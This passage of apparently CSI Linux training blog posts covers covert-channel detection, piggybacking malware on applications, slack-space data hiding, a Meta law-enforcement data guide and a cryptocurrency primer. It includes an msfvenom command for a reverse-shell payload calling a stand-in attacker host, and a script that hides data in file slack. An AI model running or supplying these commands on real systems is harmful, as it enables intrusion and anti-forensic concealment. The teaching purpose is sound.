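    """Follow-up an analyst performs on a flagged flow: render the ID bytes as text."""
    return "".join(chr(i >> 8) + chr(i & 0xFF) if both_bytes_printable(i) else "." for i in ids)


# Constructed sample: a counter-based flow and a flow whose IDs carry ASCII pairs.
NORMAL_FLOW = [("10.0.0.5", "10.0.0.1", 0x4E20 + n) for n in range(10)]
COVERT_TEXT = "Covert message!!"  # 16 characters -> 8 IDs
COVERT_FLOW = [("10.0.0.7", "10.0.0.1", (ord(COVERT_TEXT[i]) << 8) | ord(COVERT_TEXT[i + 1]))
               for i in range(0, len(COVERT_TEXT), 2)]

if __name__ == "__main__":
    for flow, info in analyse_flows(NORMAL_FLOW + COVERT_FLOW).items():
        print(flow, info)
    print(decode_ids_as_text([p[2] for p in COVERT_FLOW]))
```

The same scoring translates directly into an IDS or network-monitor rule set: group by flow, require a minimum sample size, and alert on header fields whose distribution departs from what the sending stack is known to produce. Covert data that is further encoded or encrypted before being placed in the header will not decode to printable text, so the counter and distribution checks, not the printable check, are the ones that generalise.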

Silent Infiltrators: Piggybacking Malicious Code on Legitimate Applications

The technique of piggybacking data on applications involves embedding malicious code within legitimate software applications. This method is a sophisticated way to establish a covert channel, allowing attackers to exfiltrate sensitive information from a compromised system discreetly. The malicious code is designed to execute its payload without disrupting the normal functionality of the host application, making detection by the user or antivirus software more challenging.

Technical Overview

Piggybacking often involves modifying an application’s binary or script files to include additional, unauthorized code. This code can perform a range of actions, from capturing keystrokes and collecting system information to exfiltrating data through network connections. The key to successful piggybacking is ensuring that the added malicious functionality remains undetected and does not impair the application’s intended operation.

Embedding Malicious Code
    • Binary Injection: Injecting code directly into the binary executable of an application. This requires understanding the application’s binary structure and finding suitable injection points that don’t disrupt its operation.
    • Script Modification: Altering script files or embedding scripts within applications that support scripting (e.g., office applications). This can be as simple as adding a macro to a Word document or modifying JavaScript within a web application.
Tools and Syntax
    • Metasploit: A framework that allows for the creation and execution of exploit code against a remote target machine. It includes tools for creating malicious payloads that can be embedded into applications.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > malicious.exe

This command generates an executable payload (malicious.exe) that, when executed, opens a reverse TCP connection to the attacker’s IP (attacker_ip) on port 4444. This payload can be embedded into a legitimate application.

    • Resource Hacker: A tool for viewing, modifying, adding, and deleting the embedded resources within executable files. It can be used to insert malicious payloads into legitimate applications without affecting their functionality.

Syntax: The usage of Resource Hacker is GUI-based, but it involves opening the legitimate application within the tool, adding or modifying resources (such as binary files, icons, or code snippets), and saving the modified application.

Detection and Mitigation

Detecting piggybacked applications typically involves analyzing changes to application binaries or scripts, monitoring for unusual application behaviors, and employing antivirus or endpoint detection and response (EDR) tools that can identify known malicious patterns.

Mitigation strategies include:
    • Application Whitelisting: Only allowing pre-approved applications to run on systems, which can prevent unauthorized modifications or unknown applications from executing.
    • Code Signing: Using digital signatures to verify the integrity and origin of applications. Modified applications will fail signature checks, alerting users or systems to the tampering.
    • Regular Auditing and Monitoring: Regularly auditing applications for unauthorized modifications and monitoring application behaviors for signs of malicious activity.
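As an added example (not code from the original post), a minimal file-integrity audit of the kind the auditing and monitoring item above calls for: it records a baseline of SHA-256 digests and sizes under an application directory and later reports what was modified, added or removed. The directory layout and file contents in demo() are constructed for the demonstration.

```python
"""Added example, not the post's own code: baseline-and-audit integrity check
for an application directory. A piggybacked binary changes its digest (and
usually its size), so comparing the tree against a baseline stored somewhere
the monitored host cannot rewrite surfaces the tampering."""
import hashlib
import json
import os
import tempfile


def sha256_file(path: str) -> str:
    """Stream the file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map each relative path under root (with '/' separators) to digest and size."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return baseline


def audit(root: str, baseline: dict) -> dict:
    """Compare the current tree against the baseline.

    Returns {"modified": [...], "added": [...], "removed": [...]} with sorted
    paths, so the result is stable and easy to alert on."""
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo() -> dict:
    """Constructed scenario: baseline an app directory, then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "plugins"))
        with open(os.path.join(root, "app.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 100)      # stand-in for a legitimate binary
        with open(os.path.join(root, "plugins", "a.dll"), "wb") as f:
            f.write(b"MZ" + b"\x01" * 50)
        # In practice the baseline is persisted off-host; a JSON round-trip
        # stands in for that here.
        saved = json.dumps(build_baseline(root))

        # Simulated tampering: bytes appended to app.exe (size and digest
        # change), a dropped extra file, and a removed plugin.
        with open(os.path.join(root, "app.exe"), "ab") as f:
            f.write(b"\x00" * 16)
        with open(os.path.join(root, "helper.exe"), "wb") as f:
            f.write(b"MZ")
        os.remove(os.path.join(root, "plugins", "a.dll"))
        return audit(root, json.loads(saved))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```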

Piggybacking data on applications requires a nuanced approach, blending malicious intent with technical sophistication to evade detection. By embedding malicious code within trusted applications, attackers can create a covert channel for data exfiltration, making it imperative for cybersecurity defenses to employ multi-layered strategies to detect and mitigate such threats.

As a cyber investigator, understanding the ins and outs of covert channels is crucial. They represent both a challenge and an opportunity – a puzzle to solve in the quest to secure our digital environments, and a tool that, when used ethically, can protect sensitive information from those who shouldn’t see it. Whether for unraveling the schemes of cyber adversaries or safeguarding precious data, the study of covert channels is a fascinating and essential aspect of modern cybersecurity.

Hiding Data in Slack Space

To delve deeper into the concept of utilizing disk slack space for covert storage, let’s explore not only how to embed data within this unused space but also how one can retrieve it later. Disk slack space, as previously mentioned, is the residual space in a disk’s cluster that remains after a file’s content doesn’t fill the allocated cluster(s). This underutilized space presents an opportunity for hiding data relatively undetected.

Detailed Writing to Slack Space

When using dd in Linux to write data to slack space, precision is key. The example provided demonstrates embedding a “hidden message” at the end of an existing file without altering its visible content. This method leverages the stat command to determine the file size, which indirectly helps locate the start of the slack space. The dd command then appends data directly into this slack space.

The script below determines the cluster size of the file system and the slack left in the file’s last cluster, then either warns the user if the hidden message is too large or proceeds to embed the message into the slack space of the file.

#!/bin/bash
# Define the file and hidden message
file="example.txt"
hidden_message="your hidden message here"
mount_point="/mount/point" # Change this to your actual mount point

# Determine the cluster size in bytes
cluster_size=$(stat -f --format="%S" "$mount_point")

# Determine the actual file size in bytes and calculate the available slack space
file_size=$(stat --format="%s" "$file")
occupation_of_last_cluster=$((file_size % cluster_size))
available_slack_space=$((cluster_size - occupation_of_last_cluster))

# Define the hidden message size
hidden_message_size=${#hidden_message}

# Check if the hidden message fits within the available slack space
if [ "$hidden_message_size" -gt "$available_slack_space" ]; then
    echo "Warning: The hidden message exceeds the available slack space."
else
    # Embed the hidden message into the slack space
    echo -n "$hidden_message" | dd of="$file" bs=1 seek="$file_size" conv=notrunc
    echo "Message embedded successfully."
fi

Retrieving Data from Slack Space

Retrieving data from slack space involves knowing the exact location and size of the hidden data. This can be complex, as slack space has no index or table that points to the hidden data’s location. Here’s a conceptual method to retrieve the hidden data, assuming the size of the hidden message and its offset are known:

# Define the file and the offset and size of the hidden data
# (replace the placeholders with the real byte counts; see the script above)
file="example.txt"
hidden_data_offset="size_of_original_content"
hidden_data_size="length_of_hidden_message"

# Use 'dd' to extract the hidden data
dd if="$file" bs=1 skip="$hidden_data_offset" count="$hidden_data_size" 2>/dev/null

In this command, skip is used to bypass the original content of the file and position the reading process at the beginning of the hidden data. count specifies the amount of data to read, which should match the size of the hidden message.
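As an added example (not the post’s own script), the slack-space arithmetic behind both the embedding and the retrieval steps above, run against a constructed disk image so it needs no root access or real device. The image stands in for the block device: writing past end-of-file through a file’s own path simply grows the file, so reaching real slack means addressing the cluster on the device (or an image of it), which is what the offsets below do. The cluster size, layout and message are constructed values; scan_slack is the forensic check an examiner would run on the same offsets.

```python
"""Added example, not from the original post: slack-space offset math, embed,
extract and a forensic scan, against a constructed image file."""
import os
import tempfile

CLUSTER_SIZE = 4096  # constructed; on a real volume use the file system's block size


def slack_bytes(file_size: int, cluster_size: int = CLUSTER_SIZE) -> int:
    """Unused bytes in the file's last cluster (0 when it fills the cluster exactly)."""
    rem = file_size % cluster_size
    return 0 if rem == 0 else cluster_size - rem


def slack_offset(cluster_start: int, file_size: int) -> int:
    """Device offset where the slack begins, given where the file's data begins."""
    return cluster_start + file_size


def embed(image: str, cluster_start: int, file_size: int, data: bytes,
          cluster_size: int = CLUSTER_SIZE) -> int:
    """Write data into the slack after a file; returns the device offset used.

    Raises ValueError instead of silently spilling into the next cluster,
    which would corrupt whatever file owns it."""
    if len(data) > slack_bytes(file_size, cluster_size):
        raise ValueError("hidden data exceeds available slack space")
    off = slack_offset(cluster_start, file_size)
    with open(image, "r+b") as f:      # r+b: overwrite in place, never truncate
        f.seek(off)
        f.write(data)
    return off


def extract(image: str, offset: int, length: int) -> bytes:
    """Read length bytes from offset; the caller must know both (slack has no index)."""
    with open(image, "rb") as f:
        f.seek(offset)
        return f.read(length)


def scan_slack(image: str, cluster_start: int, file_size: int,
               cluster_size: int = CLUSTER_SIZE) -> bytes:
    """Forensic check: the slack region with trailing zeros stripped.

    Freshly allocated clusters are zero-filled on most modern file systems, so
    anything left here is either residue of an older file or deliberately hidden."""
    region = extract(image, slack_offset(cluster_start, file_size),
                     slack_bytes(file_size, cluster_size))
    return region.rstrip(b"\x00")


def demo() -> dict:
    """Constructed image: 4 zeroed clusters; a 100-byte file occupies cluster 1."""
    with tempfile.NamedTemporaryFile(suffix=".img", delete=False) as f:
        f.write(b"\x00" * (4 * CLUSTER_SIZE))
        image = f.name
    cluster_start, content = CLUSTER_SIZE, b"A" * 100
    with open(image, "r+b") as f:
        f.seek(cluster_start)
        f.write(content)
    before = scan_slack(image, cluster_start, len(content))
    off = embed(image, cluster_start, len(content), b"hidden message")
    after = scan_slack(image, cluster_start, len(content))
    recovered = extract(image, off, len(b"hidden message"))
    try:
        embed(image, cluster_start, len(content), b"x" * CLUSTER_SIZE)
        overflow_rejected = False
    except ValueError:
        overflow_rejected = True
    os.remove(image)
    return {"before": before, "after": after, "recovered": recovered,
            "offset": off, "overflow_rejected": overflow_rejected}


if __name__ == "__main__":
    print(demo())
```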

Tools and Considerations for Slack Space Operations
    • Automation Scripts: Custom scripts can automate the process of embedding and extracting data from slack space. These scripts could calculate the size of the file’s content, determine the appropriate offsets, and perform the data embedding or extraction automatically.

    • Security and Privacy: Manipulating slack space for storing data covertly raises significant security and privacy concerns. It’s crucial to understand the legal and ethical implications of such actions. This technique should only be employed within the bounds of the law and for legitimate purposes, such as research or authorized security testing.

Understanding and manipulating slack space for data storage requires a thorough grasp of file system structures and the underlying physical storage mechanisms. While the Linux dd command offers a straightforward means to write to and read from specific disk offsets, effectively leveraging slack space for covert storage also demands meticulous planning and operational security to ensure the data remains concealed and retrievable only by the intended parties.

Posted on

The CSI Linux Certified Investigator (CSIL-CI)

Course: CSI Linux Certified Investigator | CSI Linux Academy

Ever wondered what sets CSI Linux apart in the crowded field of cybersecurity? Now’s your chance to not only find out but to master it — on us! CSI Linux isn’t just another distro; it’s a game-changer for cyber sleuths navigating the digital age’s complexities. Dive into the heart of cyber investigations with the CSI Linux Certified Investigator (CSIL-CI) certification, a unique blend of knowledge, skills, and the right tools at your fingertips.

Embark on a Cybersecurity Adventure with CSIL-CI

Transform your cybersecurity journey with the CSIL-CI course. It’s not just a certification; it’s your all-access pass to the inner workings of CSI Linux, tailored for the modern investigator. Delve into the platform’s cutting-edge features and discover a suite of custom tools designed with one goal in mind: to crack the case, whatever it may be.

Your Skills, Supercharged

The CSIL-CI course is your curated pathway through the labyrinth of CSI Linux. Navigate through critical areas such as Case Management, Online Investigations, and the art of Computer Forensics. Get hands-on with tackling Malware Analysis, cracking Encryption, and demystifying the Dark Web — all within the robust framework of CSI Linux.

Don’t just take our word for it. Experience firsthand how CSI Linux redefines cyber investigations. Elevate your investigative skills, broaden your cybersecurity knowledge, and become a part of an elite group of professionals with the CSIL-CI certification. Your journey into the depths of cyber investigations starts here.

Who is CSIL-CI For?
    • Law Enforcement
    • Intelligence Personnel
    • Private Investigators
    • Insurance Investigators
    • Cyber Incident Responders
    • Digital Forensics (DFIR) analysts
    • Penetration Testers
    • Social Engineers
    • Recruiters
    • Human Resources Personnel
    • Researchers
    • Investigative Journalists
CI Course Outline
    • Downloading and installing CSI Linux
    • Setting up CSI Linux
    • Troubleshooting
    • System Settings
    • The Case Management System
    • Case Management Report Templates
    • Importance of Anonymity
    • Communications Tools
    • Connecting to the Dark Web
    • Malware Analysis
    • Website Collection
    • Online Video Collection
    • Geolocation
    • Computer Forensics
    • 3rd Party Commercial Apps
    • Data Recovery
    • Incident Response
    • Memory Forensics
    • Encryption and Data Hiding
    • SIGINT, SDR, and Wireless
    • Threat Intelligence
    • Threat Hunting
    • Promoting the Tradecraft
    • The Exam
The CSIL-CI Exam details
Exam Format:
    • Online testing
    • 85 questions (Multiple Choice)
    • 2 hours
    • A minimum passing score of 85%
    • Cost: FREE
Domain Weight
    • CSI Linux Fundamentals (20%)
    • System Configuration & Troubleshooting (15%)
    • Basic Investigative Tools in CSI Linux (18%)
    • Case Management & Reporting (14%)
    • Encryption & Data Protection (10%)
    • Further Analysis & Advanced Features (7%)
Certification Validity and Retest:

The certification is valid for three years. To receive a free retest voucher within this period, you must either:

    • Submit a paper related to the subject you were certified in, ensuring it aligns with the course material.
    • Provide a walkthrough on a tool not addressed in the original course but can be a valuable supplement to the content.

This fosters continuous learning and allows for enriching the community and the field. Doing this underscores your commitment to staying updated in the industry. If you don’t adhere to these requirements and fail to recertify within the 3-year timeframe, your certification will expire.

Resource

Course: CSI Linux Certified Investigator | CSI Linux Academy

Posted on

A Simplified Guide to Accessing Facebook and Instagram Data for Law Enforcement and Investigators

In the realm of law enforcement and investigations, understanding how to legally access data from platforms like Facebook and Instagram is crucial. Given the non-technical backgrounds of many in this field, it’s essential to break down the process into understandable terms. Here’s a straightforward look at what kinds of data can be accessed, the legal pathways to obtain it, and its importance for investigations, all without the technical jargon.

The Types of Data Available

When conducting investigations, the data from social media platforms can be a goldmine of information. Here’s what can typically be accessed with legal authority:

      • Personal Details: Names, birth dates, contact information—all the basics that users provide when setting up their profiles.

      • Location History: If users have location settings enabled, you can see where they’ve been checking in or posting from.

      • Communications: Information on who users have been messaging, when, and sometimes, depending on the legal documentation, the content of those messages.

      • Online Activities: Logs of when users were active, the devices they used, and their internet addresses.

      • Photos and Videos: Visual content posted by the user can often be retrieved.

      • Financial Transactions: Records of any purchases made through these platforms.

    Legal Requirements for Data Access

    Accessing user data isn’t as simple as asking for it; there are specific legal channels that must be followed:

        • Emergency Situations: In cases where there’s an immediate risk to someone’s safety, platforms can provide information more rapidly to help prevent harm.

        • Court Orders and Search Warrants: For most investigation purposes, authorities need to obtain either a court order or a more specific search warrant, explaining why the information is necessary for the investigation.

      Why It Matters

      For law enforcement and investigators, accessing this data can be critical for:

          • Solving Crimes: Digital evidence can provide leads that aren’t available elsewhere.

          • Finding Missing Persons: Location data and communication logs can offer clues to a person’s last known whereabouts.

          • Supporting Legal Cases: Evidence gathered from these platforms can be used in court to support legal arguments.

        Privacy and Legal Compliance

        It’s important to remember that these platforms have strict policies and legal obligations to protect users’ privacy. They only release data in compliance with the law and often report on how often and why they’ve shared data with law enforcement. This transparency is key to maintaining user trust while supporting legal and investigative processes.

        Meta Platforms, Inc. 
        1 Meta Way
        Menlo Park, CA 94025

        Meta Platforms, Inc. is the new name of the parent company of Facebook and Instagram. It is important to note that Meta Platforms, Inc. does not process legal preservation and records requests through email or fax. Instead, all such legal procedures must be channeled through their dedicated Law Enforcement (LE) Portal available at: https://www.facebook.com/records. This portal serves as the central point for managing both urgent requests and all other legal formalities.

        For law enforcement officials requesting records, choosing the option “CHILD EXPLOITATION – POTENTIAL HARM” ensures that the account holder is not alerted, and there is no need for a Non Disclosure Order. For detailed guidelines, the Meta Platforms LE Guide, which includes the address mentioned above, can be found here: https://about.meta.com/actions/safety/audiences/law/guidelines/.

        Additionally, legal requests concerning Facebook and Instagram users within your jurisdiction should correctly identify Meta Platforms, Inc. as the service provider to ensure the requests are directed to the appropriate legal entity. Guidelines specific to law enforcement for Instagram can be accessed through: https://help.instagram.com/494561080557017/.

        For queries regarding the legal process, Meta provides a dedicated contact for law enforcement officials only: evacher@meta.com.

        Simplifying the Complex

        For those in law enforcement and investigations, knowing how to navigate the legalities of accessing data from platforms like Facebook and Instagram is crucial. While the process may seem daunting, understanding the basics of what data can be accessed, how to legally obtain it, and why it’s important can demystify the task. This knowledge ensures that investigations can proceed effectively, respecting both the legal process and individual privacy rights.

        Remember, this is a simplified overview designed to make the process as clear as possible for those without a technical background. The key is always to work closely with legal teams to ensure that all requests for data comply with the law, ensuring the integrity of the investigation and the privacy of all involved.


        Resources:

        Search.org
        CSI Linux Academy
        The CSI Linux Certified Social Media Investigator (CSIL-CSMI) 
        The CSI Linux Certified – OSINT Analyst (CSIL-COA)

        Posted on

        Understanding Cryptocurrencies: A Layman’s Guide

        What Are Cryptocurrencies?

        Imagine you have a virtual coin that exists on the internet. This coin is unique because it’s secure, and you can send it to anyone around the world without needing a bank. This is the essence of what a cryptocurrency is – a digital or virtual form of money that uses cryptography (a fancy word for secure communication) to make transactions safe and anonymous.

        Essentially, they are strings of encrypted data representing units of currency, secured by cryptography. Unlike traditional currencies, they operate on a decentralized network of computers (nodes) without the need for a central authority.

        The Magic Behind Cryptocurrencies: Ledgers

        Now, how do we keep track of who owns what without a central authority like a bank? Here comes the concept of a ledger. Think of a ledger as a giant, digital notebook that records every transaction made with these virtual coins. Every time someone sends or receives cryptocurrency, that transaction gets added to the notebook.

        Every cryptocurrency runs on a blockchain, a distributed ledger technology (DLT). A blockchain is a chain of blocks, where each block contains a number of transactions. Every time a cryptocurrency transaction occurs, it is broadcast to the network and, upon validation, added to a block. Once a block is filled with transactions, it is cryptographically sealed and linked to the previous block, forming a chain.

        The ledger in the context of cryptocurrencies is a blockchain. This ledger records all transactions across a network of computers. Unlike traditional ledgers, blockchain is decentralized, meaning no single entity has control over the entire ledger. This decentralization ensures security and integrity, as altering any information would require overwhelming consensus from the network participants.

        Public Ledgers: Everyone Can See, But Nobody Can Cheat

        One might wonder, “Isn’t it risky to have all transaction records in a notebook that everyone can see?” Here’s the twist – although the ledger is public and anyone can view the transactions, the details of the people making those transactions are encrypted. Think of it as writing in a diary with a secret code that only you understand. This transparency helps ensure that everything is fair and that no one is cheating the system.

        Blockchain ledgers are typically public. Transactions on the blockchain are visible to anyone who wishes to view them, yet the identities of the parties involved are protected through cryptographic techniques. Each user has a pair of keys: a public key, which is openly known and serves as an address to receive funds, and a private key, which is kept secret and used to sign transactions. This dual-key system ensures that while transactions are transparent, user identities remain confidential.

        Making Transfers: A Peer-to-Peer Network

        Transferring cryptocurrencies is like sending a secure email to someone. You simply choose how much to send, enter the recipient’s “address” (think of it as their email for cryptocurrency), and hit send. This transaction then gets verified by other users on the network (this process is called mining) and is added to the ledger. The beautiful part? There’s no middleman like a bank involved, making this process quick and relatively inexpensive.

        Transferring cryptocurrency involves creating and signing a transaction with the sender’s private key and broadcasting it to the network. Miners or validators (depending on the consensus mechanism) then verify the transaction’s validity. This involves checking the digital signatures for authenticity and ensuring the sender has the necessary funds. Once verified, the transaction is added to a block, which is then added to the blockchain. This process typically takes minutes and bypasses traditional banking systems, offering a faster, more efficient method of transferring funds.

        The Role of Consensus Mechanisms

        A crucial aspect of cryptocurrencies is the consensus mechanism, a protocol that ensures all nodes in the network agree on the current state of the blockchain. The most common mechanisms are Proof of Work (PoW) and Proof of Stake (PoS). PoW, used by Bitcoin, involves miners solving complex mathematical puzzles to validate transactions and create new blocks. PoS, an energy-efficient alternative, selects validators in proportion to their quantity of holdings in the cryptocurrency to validate transactions and create blocks.

        What is Bitcoin?

        Imagine you have a digital coin that you can send to anyone over the internet. This coin is called Bitcoin, and it was the first of what we now call cryptocurrencies. Introduced in 2009 by an unknown person or group of people under the pseudonym Satoshi Nakamoto, Bitcoin offers a way to make transactions without going through banks.

        How Does Bitcoin Work?

        Bitcoin works on a peer-to-peer network, meaning that people can send and receive bitcoins directly without intermediaries. Every Bitcoin transaction is recorded in a public ledger called the blockchain. This ensures that you can’t spend bitcoins you don’t own, copies can’t be made, and transactions are secure.

        Buying, Spending, and Mining

        You can buy bitcoins through online exchanges or receive them as payment. Once you have bitcoins, you can spend them on a growing number of goods and services or save them as an investment. New bitcoins are created through a process called mining, where powerful computers solve complex math problems. When they solve the problem, they’re rewarded with new bitcoins. This process also secures the network and processes transactions.

        Bitcoin and Blockchain Technology

        At its core, Bitcoin is a collection of computers, or nodes, that all run Bitcoin’s code and store its blockchain. A blockchain can be thought of as a collection of blocks. In each block is a collection of transactions. Because all the computers running the blockchain have the same list of blocks and transactions and can transparently see these new blocks being filled with new Bitcoin transactions, no one can cheat the system.

        Transactions and Security

        Each Bitcoin transaction is broadcast to the network and ends up in a block, where it is confirmed by miners through a process called Proof of Work (PoW). This process involves solving a computational puzzle that requires considerable processing power. The first miner to solve the puzzle adds the new block to the blockchain. This not only creates new bitcoins but also verifies and secures transactions, ensuring the integrity of the blockchain.
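As an added example (not from the original post), a toy chain showing what “cryptographically sealed and linked” and “solving a computational puzzle” mean in the consensus-mechanism paragraph earlier and the Proof of Work paragraph above: each block commits to its transactions and to the previous block’s hash, mining searches for a nonce whose SHA-256 digest starts with DIFFICULTY zero digits, and validation re-checks both the links and the puzzles so an edit to an old block is caught. The difficulty, block layout and transactions are constructed; real Bitcoin uses a far harder target and a different block format.

```python
"""Added example, not from the original post: a minimal hash-linked chain with
Proof of Work and a validator that detects tampering."""
import hashlib
import json
from typing import List, Optional

DIFFICULTY = 4   # leading hex zeros required; about 16**4 attempts on average
GENESIS_PREV = "0" * 64


def block_hash(index: int, prev_hash: str, txs: List[dict], nonce: int) -> str:
    """Hash a canonical serialization so every node computes the same value."""
    payload = json.dumps([index, prev_hash, txs, nonce], sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode()).hexdigest()


def mine(index: int, prev_hash: str, txs: List[dict]) -> dict:
    """Proof of Work: increment the nonce until the hash meets the target."""
    nonce = 0
    while True:
        h = block_hash(index, prev_hash, txs, nonce)
        if h.startswith("0" * DIFFICULTY):
            return {"index": index, "prev_hash": prev_hash, "txs": txs, "nonce": nonce, "hash": h}
        nonce += 1


def build_chain(blocks_of_txs: List[List[dict]]) -> List[dict]:
    """Mine each batch of transactions on top of the previous block."""
    chain: List[dict] = []
    prev = GENESIS_PREV
    for i, txs in enumerate(blocks_of_txs):
        block = mine(i, prev, txs)
        chain.append(block)
        prev = block["hash"]
    return chain


def validate(chain: List[dict]) -> Optional[str]:
    """Return None if the chain is consistent, else a description of the first problem."""
    for i, b in enumerate(chain):
        expected_prev = GENESIS_PREV if i == 0 else chain[i - 1]["hash"]
        if b["prev_hash"] != expected_prev:
            return f"block {i}: prev_hash does not match block {i - 1}"
        h = block_hash(b["index"], b["prev_hash"], b["txs"], b["nonce"])
        if h != b["hash"]:
            return f"block {i}: stored hash does not match contents"
        if not h.startswith("0" * DIFFICULTY):
            return f"block {i}: proof of work not satisfied"
    return None


def demo() -> dict:
    """Constructed transactions; then rewrite history and watch validation fail."""
    chain = build_chain([
        [{"from": "coinbase", "to": "alice", "amount": 50}],
        [{"from": "alice", "to": "bob", "amount": 20}],
        [{"from": "bob", "to": "carol", "amount": 5}],
    ])
    valid_before = validate(chain)
    # Tampering with block 1 invalidates its stored hash; re-mining it would
    # still break block 2's prev_hash link, so every later block would have to
    # be re-mined faster than the honest network extends the chain.
    chain[1]["txs"][0]["amount"] = 2000
    return {"valid_before": valid_before, "error_after": validate(chain)}


if __name__ == "__main__":
    print(demo())
```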

        Decentralization and Consensus

        Bitcoin’s decentralization means no single entity controls the network. It achieves consensus on the state of transactions and the blockchain through the mining process. This decentralized model protects Bitcoin from censorship and allows it to operate without a central authority.

        The Significance of Bitcoin’s Design

        Bitcoin’s design solves the “double spend” problem, ensuring that each bitcoin can only be spent once. This is achieved through the blockchain ledger, where every transaction is recorded. The ledger is public and verified by a vast amount of computing power, making Bitcoin a secure and transparent way to transfer value.

        Bitcoin, blending technology and economics, has paved the way for the development of other cryptocurrencies and blockchain applications. Its inception marks a pivotal moment in the digital age, challenging traditional notions of currency and financial transactions. Whether viewed as an investment, a technology, or a social experiment, Bitcoin’s impact on the world continues to grow.

        Understanding Bitcoin Wallet Investigations

        When someone uses Bitcoin to make transactions, they use a digital wallet. This wallet doesn’t hold physical coins. Instead, it keeps a record of all transactions. Every transaction is public and recorded on the blockchain, which is like a giant ledger. This public record makes it possible to see where Bitcoins are transferred but doesn’t directly reveal the identity of the people involved.

        Tracing Bitcoin Transactions

        Imagine you’re trying to follow the trail of a specific Bitcoin as it moves from one wallet to another. Since every transaction is recorded, you can see when Bitcoins are transferred and split into different amounts. If someone sends Bitcoin to another person, a part of that Bitcoin might be returned as “change” to the sender, similar to getting change back when you pay with cash. By looking at these patterns, how the Bitcoins are split, and where they go, you can start to follow a trail.

        The Challenge of Connecting Dots

        The tricky part is linking these movements to real-world identities. Since the blockchain only shows the movement between digital addresses, it requires additional information to identify the person behind a transaction. This is where investigation techniques come in, using clues from transactions and sometimes combining them with external data to piece together who might own a particular wallet.

        Digital Forensic Analysis of Bitcoin Wallets

        In a more technical sense, investigating Bitcoin wallets involves examining the blockchain for transaction patterns, wallet addresses, and the flow of bitcoins. Sophisticated software tools can analyze the blockchain to trace transactions back to their source or through the multiple addresses they may pass through.

        Understanding Change Addresses

        A key concept in Bitcoin transactions is the change address. When someone sends a portion of their Bitcoin balance, the unspent portion is returned to a new address in their wallet, known as a change address. This is akin to receiving change when you pay with cash, but instead of going back to the same pocket, it goes into a new one. Investigators can look for patterns where funds are split between spending and change addresses to track how bitcoins are moved and consolidated.

        Linking Transactions to Identities

        While Bitcoin transactions themselves are pseudonymous, other information can sometimes link transactions to real identities. For example, if a Bitcoin address is shared on a public forum with identifiable information, or if Bitcoins are transferred to an exchange that implements Know Your Customer (KYC) policies, these data points can be used to identify the person behind the transactions.

        Advanced Tracing Techniques

        Tracing bitcoins back to the same user involves analyzing the blockchain for patterns where bitcoins are split and then reconsolidated, indicating control by the same entity. Techniques like cluster analysis group together addresses based on transaction behavior, which, combined with external data (such as IP addresses or KYC information from exchanges), can reveal the identity of a wallet’s owner.
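As an added example (not from the original post), two of the address-linking heuristics that the change-address paragraph and the cluster-analysis paragraph above describe, run over a constructed ledger excerpt. Common-input ownership assumes every input of one transaction is controlled by the same entity (each input had to be signed), and the change rule flags, in a two-output transaction, the output paying a never-before-seen address as the sender’s fresh change. Both are heuristics; CoinJoin-style transactions deliberately defeat the first, so clusters are leads to corroborate with KYC or other external data, not proof.

```python
"""Added example, not from the original post: common-input clustering with a
union-find structure, plus a simple change-output heuristic, over constructed
transactions (SAMPLE_TXS)."""
from typing import Dict, List, Set


class UnionFind:
    """Disjoint sets over address strings; find() returns the cluster representative."""

    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, a: str) -> str:
        self.parent.setdefault(a, a)
        while self.parent[a] != a:
            self.parent[a] = self.parent[self.parent[a]]  # path halving
            a = self.parent[a]
        return a

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def likely_change_outputs(txs: List[dict]) -> Dict[str, str]:
    """Map transaction id -> address guessed to be the sender's change.

    Fires only on two-output transactions where exactly one output address has
    never appeared earlier in the (chain-ordered) transaction list."""
    seen: Set[str] = set()
    guesses: Dict[str, str] = {}
    for tx in txs:
        outs = [o["to"] for o in tx["outputs"]]
        if len(outs) == 2:
            fresh = [a for a in outs if a not in seen]
            if len(fresh) == 1:
                guesses[tx["id"]] = fresh[0]
        seen.update(tx["inputs"])
        seen.update(outs)
    return guesses


def link_addresses(txs: List[dict], use_change: bool = True) -> List[List[str]]:
    """Cluster addresses by common-input ownership, optionally folding in change guesses.

    Returns clusters of two or more addresses as sorted lists, for stable comparison."""
    uf = UnionFind()
    change = likely_change_outputs(txs) if use_change else {}
    for tx in txs:
        addrs = list(tx["inputs"])          # all inputs were signed by one spender
        if tx["id"] in change:
            addrs.append(change[tx["id"]])  # change returns to the same spender
        for a in addrs[1:]:
            uf.union(addrs[0], a)
    groups: Dict[str, Set[str]] = {}
    for a in list(uf.parent):
        groups.setdefault(uf.find(a), set()).add(a)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


# Constructed ledger excerpt: "A*" addresses belong to one wallet, "B*" to
# another, "C1" is a merchant. Amounts are illustrative; "inputs" lists the
# addresses being spent, tx0 is a coinbase-style transaction with no inputs.
SAMPLE_TXS = [
    {"id": "tx0", "inputs": [], "outputs": [{"to": "A1", "amount": 50}, {"to": "B1", "amount": 30}]},
    {"id": "tx1", "inputs": ["A1"], "outputs": [{"to": "B1", "amount": 10}, {"to": "A2", "amount": 40}]},
    {"id": "tx2", "inputs": ["A2", "A3"], "outputs": [{"to": "C1", "amount": 45}, {"to": "A4", "amount": 2}]},
    {"id": "tx3", "inputs": ["B1"], "outputs": [{"to": "C1", "amount": 5}, {"to": "B2", "amount": 25}]},
]

if __name__ == "__main__":
    print("change guesses:", likely_change_outputs(SAMPLE_TXS))
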